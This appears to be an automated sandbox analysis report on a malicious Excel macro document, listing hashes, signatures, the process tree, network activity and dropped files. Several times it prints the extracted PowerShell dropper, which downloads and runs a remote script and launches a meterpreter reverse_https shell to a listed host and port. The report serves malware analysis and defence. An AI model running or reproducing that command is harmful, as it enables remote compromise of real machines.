Analysis

  • max time kernel
    19s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/07/2024, 21:57 UTC

General

  • Target

    f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls

  • Size

    35KB

  • MD5

    37c6ff0b9bc51d0fcb452256f18a598b

  • SHA1

    53eb945d5f264f9bce3ec8da311544d3aa6d3f4d

  • SHA256

    f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55

  • SHA512

    6c21282c8a5052703299122cd25f03ba1ffccbbdcfe670ae68f001953e246695b1685a37669061a1eb7cd8893776da04f963a1592a4fdbca1e514601ef42a632

  • SSDEEP

    768:Ftvo+/zZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ9QCv/1f93:t1k3hbdlylKsgqopeJBWhZFGkE+cL2NO

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2384
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3000

Network

  • DNS (US)
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.111.133
    185.199.108.133
    185.199.109.133
    185.199.110.133

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q3C17KOP9SF5JUIRLDIT.temp

    Filesize

    7KB

    MD5

    87ad9165900c1699cd0a201fe192ff59

    SHA1

    e3325d8d32baa8c250a43c8110a62e6dd91a2e1c

    SHA256

    8f3bc412af2b605c78cb1126318d831e2975de9ae1211df9f1b8dcf02067dc34

    SHA512

    330fb8bcc2d8d0af4880330023f0ebf970866353d91e59f0ea355ace0add9b98a03a3a247c5252b2fc68e6b6a504be793d3fc314998fee1a935d916d6f443136

  • C:\Users\Public\config.vbs

    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

  • memory/2544-39-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/2544-18-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/2544-37-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/2544-38-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/2544-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2544-17-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/2544-1-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

  • memory/2544-49-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

  • memory/2544-50-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

  • memory/3000-45-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

  • memory/3000-46-0x00000000022E0000-0x00000000022E8000-memory.dmp

    Filesize

    32KB